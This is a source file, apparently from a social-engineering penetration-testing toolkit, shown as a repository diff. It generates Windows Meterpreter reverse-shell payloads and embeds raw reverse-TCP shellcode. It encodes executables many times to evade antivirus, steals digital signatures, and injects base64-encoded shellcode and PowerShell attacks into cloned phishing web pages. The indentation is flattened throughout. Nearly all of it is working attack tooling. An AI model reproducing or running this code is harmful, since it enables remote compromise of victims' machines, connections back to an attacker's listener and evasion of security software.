generate_list=subprocess.Popen("%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait()
print "[---] Database is now up-to-date [---]"

0
src/core/payloadgen/__init__.py Normal file
View file

752
src/core/payloadgen/create_payloads.py Normal file
View file

@ -0,0 +1,752 @@
#!/usr/bin/env python
## Import modules
import subprocess
import time
import sys
import os
import re
import socket
import base64
from src.core.setcore import *
from src.core.menu.text import *
from src.core.dictionaries import *
me = mod_name()
listener="notdefined"
definepath=os.getcwd()
sys.path.append(definepath)
port1 = "8080"
port2 = "8081"
operating_system = check_os()
# grab configuration options
encount="4"
configfile=file("%s/config/set_config" % (definepath),"r").readlines()
auto_migrate="OFF"
msf_path = meta_path()
for line in configfile:
line=line.rstrip()
match1=re.search("ENCOUNT=", line)
if match1:
line=line.replace("ENCOUNT=", "")
encount=line
match2=re.search("AUTO_MIGRATE=", line)
if match2:
line=line.replace("AUTO_MIGRATE=", "")
auto_migrate=line
match3=re.search("DIGITAL_SIGNATURE_STEAL=", line)
if match3:
digital_steal=line.replace("DIGITAL_SIGNATURE_STEAL=", "")
match4=re.search("METERPRETER_MULTI_SCRIPT=", line)
if match4:
meterpreter_multi=line.replace("METERPRETER_MULTI_SCRIPT=", "")
match5=re.search("LINUX_METERPRETER_MULTI_SCRIPT=", line)
if match5:
linux_meterpreter_multi=line.replace("LINUX_METERPRETER_MULTI_SCRIPT=", "")
match6=re.search("METERPRETER_MULTI_COMMANDS=", line)
if match6:
meterpreter_multi_command=line.replace("METERPRETER_MULTI_COMMANDS=", "")
meterpreter_multi_command=meterpreter_multi_command.replace(";", "\n")
match7=re.search("LINUX_METERPRETER_MULTI_COMMANDS=", line)
if match7:
linux_meterpreter_multi_command=line.replace("LINUX_METERPRETER_MULTI_COMMANDS=", "")
linux_meterpreter_multi_command=linux_meterpreter_multi_command.replace(";", "\n")
# define if we use upx encoding or not
match8=re.search("UPX_ENCODE=", line)
if match8:
upx_encode=line.replace("UPX_ENCODE=", "")
# set the upx flag
match9=re.search("UPX_PATH=", line)
if match9:
upx_path=line.replace("UPX_PATH=", "")
if upx_encode == "ON":
if not os.path.isfile(upx_path):
if operating_system != "windows":
print_error("ERROR:UPX packer not found in the pathname specified in config. Disabling UPX packing for executable!")
upx_encode == "OFF"
# set the unc embed flag
match10=re.search("UNC_EMBED=", line)
if match10:
unc_embed=line.replace("UNC_EMBED=", "")
# add the digital signature stealing
if digital_steal == "ON":
try:
debug_msg(me,"importing Python module 'pefile'",1)
try: reload(pefile)
except: import pefile
sys.path.append("src/core/digitalsig/")
debug_msg(me,"importing 'src.core.digitalsig.disitool'",1)
try: reload(disitool)
except: import disitool
except ImportError:
if operating_system != "windows":
print_error("Error:PEFile not detected. You must download it from http://code.google.com/p/pefile/")
print_warning("Turning the digital signature stealing flag off... A/V Detection rates may be lower.")
digital_steal = "OFF"
attack_vector=0
linosx=0
multiattack=""
# grab attack vector
if os.path.isfile("src/program_junk/attack_vector"):
fileopen=file("src/program_junk/attack_vector", "r")
for line in fileopen:
line=line.rstrip()
if line == "java":
attack_vector="java"
if line == "multiattack":
attack_vector="multiattack"
multiattack=file("src/program_junk/multi_payload","w")
# here is a place holder for the multi attack java
# multiattack outputs a file called multi_java if
# this file is present it will allow additional
# functionality
multiattack_java="off"
if os.path.isfile("src/program_junk/multi_java"):
multiattack_java="on"
# grab binary path if needed
fileopen=file("config/set_config", "r")
for line in fileopen:
match=re.search("CUSTOM_EXE=", line)
if match:
line=line.rstrip()
line=line.replace("CUSTOM_EXE=", "")
custom_exe=line
if custom_exe == "legit.binary": custom_exe="src/payloads/exe/legit.binary"
# custom payloadgen
payloadgen="regular"
if os.path.isfile("src/program_junk/payloadgen"):
payloadgen="solo"
# set ipquestion to blank until otherwise pulled
ipquestion=""
####################################################################################################################################
# grab ipaddr if it hasn't been identified yet
####################################################################################################################################
if not os.path.isfile("src/program_junk/ipaddr.file"):
filewrite=file("src/program_junk/ipaddr.file","w")
fileopen=file("config/set_config", "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("AUTO_DETECT=ON", line)
if match:
try:
ipaddr=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ipaddr.connect(('google.com', 0))
ipaddr.settimeout(2)
ipaddr=ipaddr.getsockname()[0]
filewrite.write(ipaddr)
filewrite.close()
except Exception,e:
log(e)
ipaddr=raw_input(setprompt(["4"], "IP address for the payload listener"))
filewrite.write(ipaddr)
filewrite.close()
# if AUTO_DETECT=OFF prompt for IP Address
for line in fileopen:
line=line.rstrip()
match=re.search("AUTO_DETECT=OFF", line)
if match:
ipaddr=raw_input(setprompt(["4"], "Enter the IP address for the payload (reverse)"))
filewrite.write(ipaddr)
filewrite.close()
# payload selection here
try:
# Specify path to metasploit
path=msf_path
# Specify payload
# this is encoding
encode=""
# this is payload
choice1=""
# this is port
choice3=""
if os.path.isfile("src/program_junk/meterpreter_reverse_tcp_exe"):
fileopen=file("src/program_junk/meterpreter_reverse_tcp_exe", "r")
for line in fileopen:
# this reads in the first line of the file which happens to be port
# when calling through core
choice3=line.rstrip()
# change attack_vector to nothing
attack_vector=""
# specify payload
choice1="windows/meterpreter/reverse_tcp"
# encode using backdoored executable
encode="16"
# if we don't trigger on the standard core api call
if choice1 == "":
###################################################
# USER INPUT: SHOW PAYLOAD MENU 1 #
###################################################
debug_msg(me,"printing 'text.payload_menu_1'",5)
show_payload_menu1 = create_menu(payload_menu_1_text, payload_menu_1)
choice1 = raw_input(setprompt(["4"], ""))
if operating_system == "windows" or msf_path == False:
# default blank then select SETSHELL
if choice1 == "":
choice1 = "11"
# if we specify choice 1, thats SETSHELL
if choice1 == "1":
choice1 == "11"
# if we specify choice 2, thats the SET reverse http shell
if choice1 == "2":
choice1 = "12"
# selecting ratte
if choice1 == "3":
choice1 = "13"
# if they specified something else that wasn't there just default to SETSHELL
else: choice1 = "11"
# check the length and make sure it works
if choice1 != "":
choice1 = check_length(choice1,17)
# convert it to a string
choice1 = str(choice1)
custom=0
counter=0
flag=0
encode_stop=0
# Condition testing of 'choice1'
# Will use a dictionary list
if choice1 == "exit":
exit_set()
if choice1 == '':
choice1 = ("11")
if choice1 == '5' or choice1 == '6' or choice1 == '7':
encode_stop = 1
encode = ""
if choice1 == '8':
flag = 1
# here we specify shellcodeexec
if choice1 == '14' or choice1 == '15' or choice1 == '16':
encode_stop = 1
encode = 0
# 11 is the set interactive shell, 12 is set rev http shell and 13 is ratte listener
if choice1 == '11' or choice1 == '12' or choice1 == "13":
encoder = 'false'
payloadgen = 'solo'
encode_stop = 1
filewrite = file("%s/src/program_junk/set.payload" % (definepath), "w")
# select setshell
if choice1 == '11':
filewrite.write("SETSHELL")
# select setshell_reverse
if choice1 == '12':
filewrite.write("SETSHELL_HTTP")
# select ratte
if choice1 == '13':
filewrite.write("RATTE")
filewrite.close()
if choice1 != "17":
# if not then import the payload selection
choice1 = ms_payload_2(choice1)
# don't do courtesy shell
if counter==0:
courtesyshell=("")
# if custom
if choice1=='17':
print_info("Example: /root/custom.exe")
choice1=raw_input(setprompt(["4"], "Enter the path to your executable"))
if not os.path.isfile(choice1):
while 1:
print_error("ERROR:File not found. Try Again.")
choice1=raw_input(setprompt(["4"], "Enter the path to your executable"))
if os.path.isfile(choice1):
break
update_options("CUSTOM_EXE=%s" % (choice1))
custom=1
# if we are using our own executable
if custom == 1:
check_write=file("src/program_junk/custom.exe", "w")
check_write.write("VALID")
check_write.close()
shutil.copyfile("%s" % (choice1), "msf.exe") #subprocess.Popen("cp %s msf.exe;cp msf.exe %s/src/html/msf.exe" % (choice1,definepath), shell=True).wait()
shutil.copyfile("msf.exe", "%s/src/html/msf.exe" % (definepath))
# Specify Encoding Option
encoder="false"
# if we aren't using the set shell
if choice1 != "set/reverse_shell":
# we need to rewrite index.html real quick because it has a parameter that could get confusing
if os.path.isfile("%s/src/program_junk/web_clone/index.html" % (definepath)):
fileopen = file("%s/src/program_junk/web_clone/index.html" % (definepath),"r")
data = fileopen.read()
data = data.replace("freehugs", "")
os.remove("%s/src/program_junk/web_clone/index.html" % (definepath))
filewrite=file("%s/src/program_junk/web_clone/index.html" % (definepath), "w")
filewrite.write(data)
filewrite.close()
if custom == 0:
if encode_stop == 0 and encode != "16" and choice1 != "set/reverse_shell":
###################################################
# USER INPUT: SHOW ENCODER MENU #
###################################################
debug_msg (me,"printing 'text.encoder_menu'",5)
show_encoder_menu = create_menu(encoder_text, encoder_menu)
encode = raw_input(setprompt(["18"], ""))
encoder="true"
if encode == 'exit':
exit_set()
# turn off some options if fasttrack is in use
if os.path.isfile("src/program_junk/fasttrack.options"):
upx_encode == "OFF"
encode = "2"
encoder = "true"
# Handle special cases
if encode=='' or encode == ' ': encode = '16'
if encode == '16': encount=0
if encode=='14' or encode == '0': encoder="false"
# do dictionary lookup
encode1 = encoder_type(encode)
encode = "x86/" + encode1
if encode == "x86/MULTIENCODE" or encode == "x86/BACKDOOR":
encode = encode.replace("x86/", "")
# Specify Remote Host if ipaddr.file is missing (should never get here)
if not os.path.isfile("src/program_junk/ipaddr.file"):
choice2=raw_input(setprompt(["4"], "IP Address of the listener/attacker (reverse) or host/victim (bind shell)"))
filewrite=file("src/program_junk/ipaddr.file","w")
filewrite.write(choice2)
filewrite.close()
fileopen=file("src/program_junk/ipaddr.file" , "r").readlines()
for line in fileopen:
line=line.rstrip()
choice2=line
# grab interface ip address
if os.path.isfile("src/program_junk/interface"):
fileopen=file("src/program_junk/interface", "r").readlines()
for line in fileopen:
line=line.rstrip()
ipquestion=line
# specify the port for the listener
if choice3 == "":
if choice1 != "shellcode/multipyinject":
choice3=raw_input(setprompt(["4"], "PORT of the listener [443]"))
if choice3 == '': choice3 = '443'
# this is needed for the set_payload
filewrite = file ("%s/src/program_junk/port.options" % (definepath), "w")
filewrite.write(choice3)
filewrite.close()
# if we are using the SET interactive shell then do this
if choice1 == "set/reverse_shell":
encoder = "false"
filewrite=file("%s/src/program_junk/set.payload.posix" % (definepath), "w")
filewrite.write("true")
filewrite.close()
import src.core.payloadprep
# if were using the multiattack option
if attack_vector == "multiattack":
multiattack.write("MAIN="+str(choice3)+"\n")
multiattack.write("MAINPAYLOAD="+str(choice1)+"\n")
# if encoding is required, it will place 1msf.exe first then encode it to msf.exe
if encoder == "true":
choice4=("R")
msf_filename=("1msf.exe")
if encoder == "false":
choice4=("X")
msf_filename=("msf.exe")
# set choice to blank for ALL PORTS scan
if flag == 0:
portnum="LPORT="+choice3
if flag == 1:
portnum=""
if encode != "BACKDOOR":
# if we aren't using the set reverse shell
if choice1 != "set/reverse_shell":
# if we aren't using shellcodeexec
if choice1 != "shellcode/alphanum":
if choice1 != "shellcode/pyinject":
if choice1 != "shellcode/multipyinject":
generatepayload=subprocess.Popen(r"ruby %s/msfpayload %s LHOST=%s %s %s %s > %s/src/html/%s" % (path,choice1,choice2,portnum,courtesyshell,choice4,definepath,msf_filename), shell=True).wait()
# if we are using shellcodeexec
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n")
# select payload
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
# select default meterpreter reverse tcp
if choice9 == "" or choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
if choice1 == "shellcode/alphanum":
print_status("Generating the payload via msfpayload and generating alphanumeric shellcode...")
subprocess.Popen("ruby %s/msfpayload %s LHOST=%s %s EXITFUNC=thread R > %s/src/program_junk/meterpreter.raw" % (path,choice9,choice2,portnum,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("ruby %s/msfencode -e x86/alpha_mixed -i %s/src/program_junk/meterpreter.raw -t raw BufferRegister=EAX > %s/src/program_junk/meterpreter.alpha_decoded" % (path,definepath,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
# define, this will eventually be all of our payloads
multipyinject_payload = ""
# clean up old file
if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
os.remove("%s/src/program_junk/meta_config_multipyinjector" % (definepath))
while 1:
if choice1 == "shellcode/multipyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n 5) I'm finished adding payloads.\n")
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
# select default meterpreter reverse tcp
if choice9 == "" or choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
# break out of loop, no longer needed
if choice9 == "5": break
shellcode_port = raw_input(setprompt(["4"], "Enter the port number [443]"))
if shellcode_port == "": shellcode_port = "443"
# here we prep our meta config to listen on all the ports we want - free hugs all around
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (choice9,shellcode_port))
filewrite.close()
if choice9 == "windows/meterpreter/reverse_tcp_allports": portnum = "LPORT=1"
if choice9 == "windows/meterpreter/reverse_tcp":
# shellcode for meterpreter reverse_tcp
shellcode = r"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xff\xfe\xfd\xfc\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3"
if choice9 == "windows/meterpreter/reverse_https":
# cant do shellcode injection here yet #shellcode = r"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x6a\x00\x54\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x5f\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\xbb\x01\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x48\x59\x31\xd2\x52\x68\x00\x32\xa0\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x6a\x10\x5b\x68\x80\x33\x00\x00\x89\xe0\x6a\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x31\xff\x57\x57\x57\x57\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1a\x4b\x74\x10\xeb\xd5\xeb\x49\xe8\xb3\xff\xff\xff\x2f\x63\x79\x30\x50\x00\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcd\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\x51\xff\xff\xff\x32\x35\x35\x2e\x32\x35\x34\x2e\x32\x35\x33\x2e\x32\x35\x32\x00"
print_status("Reverse_HTTPS takes a few seconds to calculate..One moment..")
shellcode = generate_shellcode(choice9, choice2,portnum)
if choice9 == "windows/meterpreter/reverse_http":
print_status("Reverse_HTTP takes a few seconds to calculate..One moment..")
#shellcode = r"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x6a\x00\x54\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x4b\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\xbb\x01\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x34\x59\x31\xd2\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x6a\x10\x5b\x31\xff\x57\x57\x57\x57\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1a\x4b\x74\x10\xeb\xe9\xeb\x49\xe8\xc7\xff\xff\xff\x2f\x64\x57\x70\x31\x00\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcd\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\x65\xff\xff\xff\x32\x35\x35\x2e\x32\x35\x34\x2e\x32\x35\x33\x2e\x32\x35\x32\x00"
shellcode = generate_shellcode(choice9, choice2,portnum)
if choice9 == "windows/meterpreter/reverse_tcp_allports":
#shellcode = r"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\xff\xfe\xfd\xfc\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x12\x31\xc0\x66\x8b\x46\x02\x86\xe0\x66\x40\x86\xe0\x66\x89\x46\x02\xeb\xdf\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3"
print_status("Reverse TCP Allports takes a few seconds to calculate..One moment..")
shellcode = generate_shellcode(choice9, choice2,portnum)
if choice1 == "shellcode/pyinject":
shellcode_port = portnum.replace("LPORT=", "")
shellcode = shellcode_replace(choice2, shellcode_port, shellcode)
# break out of the loop if we are only using one payload else keep on
if choice1 == "shellcode/pyinject": break
multipyinject_payload += shellcode + ","
# get rid of tail comma
if multipyinject_payload.endswith(","):
multipyinject_payload = multipyinject_payload[:-1]
# if we have multiple payloads, use multi injector
if choice1 == "shellcode/multipyinject":
shellcode = multipyinject_payload
filewrite = file("%s/src/program_junk/meterpreter.alpha_decoded" % (definepath), "w")
filewrite.write(shellcode)
filewrite.close()
# here we are going to encode the payload via base64
fileopen = file("%s/src/program_junk/meterpreter.alpha_decoded" % (definepath), "r")
data = fileopen.read()
if payloadgen != "solo":
# base64 1
data = base64.b64encode(data)
# encode it again for the fun 2
data = base64.b64encode(data)
# again 3
data = base64.b64encode(data)
# again 4
data = base64.b64encode(data)
# again 5
data = base64.b64encode(data)
# again 6
data = base64.b64encode(data)
# again 7
data = base64.b64encode(data)
# again 8
data = base64.b64encode(data)
# ok ok last time
data = base64.b64encode(data)
filewrite = file("%s/src/program_junk/meterpreter.alpha" % (definepath), "w")
filewrite.write(data)
filewrite.close()
if choice1 == "shellcode/alphanum":
print_status("Prepping shellcodeexec for delivery..")
if choice1 == "shellcode/pyinject":
print_status("Prepping pyInjector for delivery..")
# prepping multi pyinjector
if choice1 == "shellcode/multipyinject":
print_status("Prepping Multi-pyInjector for delivery..")
# here we obfuscate the binary a little bit
random_string = generate_random_string(3,3).upper()
if choice1 == "shellcode/alphanum":
fileopen = file("%s/src/payloads/exe/shellcodeexec.binary" % (definepath), "rb")
if choice1 == "shellcode/pyinject":
fileopen = file("%s/src/payloads/set_payloads/pyinjector.binary" % (definepath), "rb")
if choice1 == "shellcode/multipyinject":
fileopen = file("%s/src/payloads/set_payloads/multi_pyinjector.binary" % (definepath), "rb")
filewrite = file("%s/src/program_junk/shellcodeexec.custom" % (definepath), "wb")
data = fileopen.read()
filewrite.write(data.replace("UPX", random_string, 4))
filewrite.close()
subprocess.Popen("cp %s/src/program_junk/shellcodeexec.custom %s/src/html/msf.exe 1> /dev/null 2> /dev/null" % (definepath,definepath), shell=True).wait()
# we need to read in the old index.html file because its already generated, need to present the alphanum to it
if os.path.isfile("%s/src/program_junk/web_clone/index.html" % (definepath)):
fileopen = file("%s/src/program_junk/web_clone/index.html" % (definepath), "r")
filewrite = file("%s/src/program_junk/web_clone/index.html.new" % (definepath), "w")
fileopen2 = file("%s/src/program_junk/meterpreter.alpha" % (definepath), "r")
alpha_shellcode = fileopen2.read().rstrip()
data = fileopen.read()
data = data.replace('param name="2" value=""', 'param name="2" value="%s"' % (alpha_shellcode))
filewrite.write(data)
# close file
filewrite.close()
# rename file
if choice1 == "shellcode/alphanum":
print_status("Prepping website for alphanumeric injection..")
if choice1 == "shellcode/pyinject":
print_status("Prepping website for pyInjector shellcode injection..")
print_status("Base64 encoding shellcode and prepping for delivery..")
subprocess.Popen("mv %s/src/program_junk/web_clone/index.html.new %s/src/program_junk/web_clone/index.html 1> /dev/null 2> /dev/null" % (definepath,definepath), shell=True).wait()
if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1"
choice3 = "1"
filewrite = file("%s/src/program_junk/port.options" % (definepath), "w")
filewrite.write("1")
filewrite.close()
# here we specify the payload name thats stored later on
choice1 = choice9
# write out the payload for powershell injection to pick it up if used
filewrite = file("src/program_junk/metasploit.payload", "w")
filewrite.write(choice1)
filewrite.close()
# import if on
setshell_counter = 0
powershell = check_config("POWERSHELL_INJECTION=")
if powershell.lower() == "on" or powershell.lower() == "yes":
if choice1 == "set/reverse_shell" or choice1 == "RATTE":
print_status("Please note that the SETSHELL and RATTE are not compatible with the powershell injection technique. Disabling the powershell attack.")
setshell_counter = 1
if setshell_counter == 0:
if os.path.isfile("%s/src/program_junk/web_clone/index.html" % (definepath)):
import src.payloads.powershell.prep
if os.path.isfile("%s/src/program_junk/x64.powershell" % (definepath)):
fileopen1 = file("%s/src/program_junk/x64.powershell" % (definepath), "r")
x64 = fileopen1.read()
# open up the x86 powershell attack
fileopen2 =file("%s/src/program_junk/x86.powershell" % (definepath), "r")
x86 = fileopen2.read()
# open up the original file and replace stuff
fileopen3 = fileopen = file("%s/src/program_junk/web_clone/index.html" % (definepath), "r")
filewrite = file("%s/src/program_junk/web_clone/index.html.new" % (definepath), "w")
data = fileopen3.read()
data = data.replace('param name="5" value=""', 'param name="5" value="%s"' % (x64))
data = data.replace('param name="6" value=""', 'param name="6" value="%s"' % (x86))
# check if we don't want to deploy binaries
deploy_binaries = check_config("DEPLOY_BINARIES=")
if deploy_binaries.lower() == "n" or deploy_binaries.lower() == "no":
data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/src/program_junk/web_clone/index.html.new %s/src/program_junk/web_clone/index.html" % (definepath,definepath), stdout=subprocess.PIPE, shell=True)
if encoder == "true":
# If not option 16 or default then go here
if encode != "MULTIENCODE":
if encode != "BACKDOOR":
print_info("Encoding the payload %s times to get around pesky Anti-Virus. [-]\n" % (str(encount)))
encodepayload=subprocess.Popen(r"ruby %s/msfencode < %s/src/html/1msf.exe -e %s -o %s/src/html/msf.exe -t exe -c %s" % (path,definepath,encode,definepath,encount), shell=True).wait()
subprocess.Popen("cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
# If option 16 or default then go here
if encode == "MULTIENCODE":
print_info("Encoding the payload multiple times to get around pesky Anti-Virus.")
encodepayload=subprocess.Popen(r"ruby %s/msfencode -e x86/shikata_ga_nai -i %s/src/html/1msf.exe -t raw -c 5 | ruby %s/msfencode -t raw -e x86/alpha_upper -c 2 | ruby %s/msfencode -t raw -e x86/shikata_ga_nai -c 5 | ruby %s/msfencode -t exe -c 5 -e x86/countdown -o %s/src/html/msf.exe" % (path,definepath,path,path,path,definepath), shell=True).wait()
subprocess.Popen("cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
encode1=("x86/countdown")
